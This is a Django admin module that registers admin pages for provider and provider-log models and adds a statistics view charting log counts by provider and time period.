1
|
import logging
from functools import update_wrapper
from django.contrib import admin
from django.db.models import Count, DateTimeField, Min, Max
from django.db.models.functions import Trunc
from .models import Provider, ProviderLog, ReadonlyProviderLog
logger = logging.getLogger(__name__)
# noinspection PyAttributeOutsideInit,PyUnresolvedReferences
class FieldsMixin(object):
def add_view(self, request, form_url='', extra_context=None):
try:
if hasattr(self, 'add_fields'):
self.fields = self.add_fields
elif hasattr(self, 'default_fields'):
self.fields = self.default_fields
elif hasattr(self, 'fields'):
del self.fields
except Exception as e:
logger.debug(e, exc_info=True)
try:
if hasattr(self, 'add_readonly_fields'):
self.readonly_fields = self.add_readonly_fields
elif hasattr(self, 'default_readonly_fields'):
self.readonly_fields = self.default_readonly_fields
elif hasattr(self, 'readonly_fields'):
del self.readonly_fields
except Exception as e:
logger.debug(e, exc_info=True)
return super(FieldsMixin, self).add_view(request, form_url, extra_context)
def change_view(self, request, object_id, form_url='', extra_context=None):
try:
if hasattr(self, 'change_fields'):
self.fields = self.change_fields
elif hasattr(self, 'default_fields'):
self.fields = self.default_fields
elif hasattr(self, 'fields'):
del self.fields
except Exception as e:
logger.debug(e, exc_info=True)
try:
if hasattr(self, 'change_readonly_fields'):
self.readonly_fields = self.change_readonly_fields
elif hasattr(self, 'default_readonly_fields'):
self.readonly_fields = self.default_readonly_fields
elif hasattr(self, 'readonly_fields'):
del self.readonly_fields
except Exception as e:
logger.debug(e, exc_info=True)
return super(FieldsMixin, self).change_view(request, object_id, form_url, extra_context)
class ProviderAdmin(FieldsMixin, admin.ModelAdmin):
list_display = ['name', 'code']
fields = ['name', 'code']
readonly_fields = ['token', 'url']
add_fields = fields
change_fields = fields + readonly_fields
class ProviderLogAdmin(FieldsMixin, admin.ModelAdmin):
list_display = ['provider', 'content_type', 'received_time', 'is_valid', ]
list_filter = ['provider__name', 'content_type', 'received_time', 'is_valid', ]
fields = ['provider', 'content_type', 'body', ('file_name', 'ext'), 'file_path', 'received_time', 'is_valid', 'uuid4', ]
readonly_fields = ['uuid4', ]
# https://medium.com/@hakibenita/how-to-turn-django-admin-into-a-lightweight-dashboard-a0e0bbf609ad
# Wonderful way to add some graphs :)
# noinspection PyProtectedMember
class ReadonlyProviderLogAdmin(FieldsMixin, admin.ModelAdmin):
change_list_template = 'admin/readonly_provider_change_list.html'
date_hierarchy = 'received_time'
list_display = ['provider', 'content_type', 'received_time', 'is_valid', ]
list_filter = ['received_time', 'provider__name', 'content_type', 'is_valid', ]
default_fields = ['provider', 'content_type', 'file_name', 'file_path', 'ext', 'received_time', 'is_valid', 'uuid4', 'parsed_body']
default_readonly_fields = []
add_fields = ['provider', 'content_type', 'body', 'file_name', 'ext', 'received_time', 'is_valid', ]
change_fields = ['provider', 'content_type', ('file_name', 'ext'), 'file_path', 'received_time', 'is_valid', 'uuid4', 'parsed_body']
change_readonly_fields = ['provider', 'content_type', 'file_name', 'ext', 'file_path', 'received_time', 'is_valid', 'uuid4', 'parsed_body']
def stats_view(self, request, extra_context=None):
def get_next_in_date_hierarchy(req, date_hierarchy):
if date_hierarchy + '__day' in req.GET:
return 'hour'
if date_hierarchy + '__month' in req.GET:
return 'day'
if date_hierarchy + '__year' in req.GET:
return 'month'
return 'month'
response = self.changelist_view(request, extra_context)
response.template_name = 'admin/readonly_provider_log_summary_change_list.html'
try:
qs = response.context_data['cl'].queryset
except (AttributeError, KeyError):
return response
metrics = {
'total': Count('id'),
}
summary = list(
qs.values('provider__name')
.annotate(**metrics)
.order_by('-total')
)
response.context_data['summary'] = summary
summary_total = dict(
qs.aggregate(**metrics)
)
response.context_data['summary_total'] = summary_total
period = get_next_in_date_hierarchy(
request,
self.date_hierarchy,
)
response.context_data['period'] = period
summary_over_time = qs.annotate(
period=Trunc(
'received_time',
period,
output_field=DateTimeField(),
),
) \
.values('period') \
.annotate(total=Count('id')) \
.order_by('period')
summary_range = summary_over_time.aggregate(
low=Min('total'),
high=Max('total'),
)
high = summary_range.get('high', 0)
low = summary_range.get('low', 0)
response.context_data['summary_over_time'] = [
{
'period': x['period'],
'total': x['total'] or 0,
'pct':
((x['total'] or 0) / high) * 100
if high > low else 100,
} for x in summary_over_time]
return response
def get_urls(self):
urlpatterns = super(ReadonlyProviderLogAdmin, self).get_urls()
from django.conf.urls import url
def wrap(view):
def wrapper(*args, **kwargs):
return self.admin_site.admin_view(view)(*args, **kwargs)
wrapper.model_admin = self
return update_wrapper(wrapper, view)
info = self.model._meta.app_label, self.model._meta.model_name
urlpatterns = [
url(r'^statistics/$', wrap(self.stats_view), name='%s_%s_statistics' % info),
] + urlpatterns
return urlpatterns
admin.site.register(Provider, ProviderAdmin)
admin.site.register(ProviderLog, ProviderLogAdmin)
admin.site.register(ReadonlyProviderLog, ReadonlyProviderLogAdmin)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.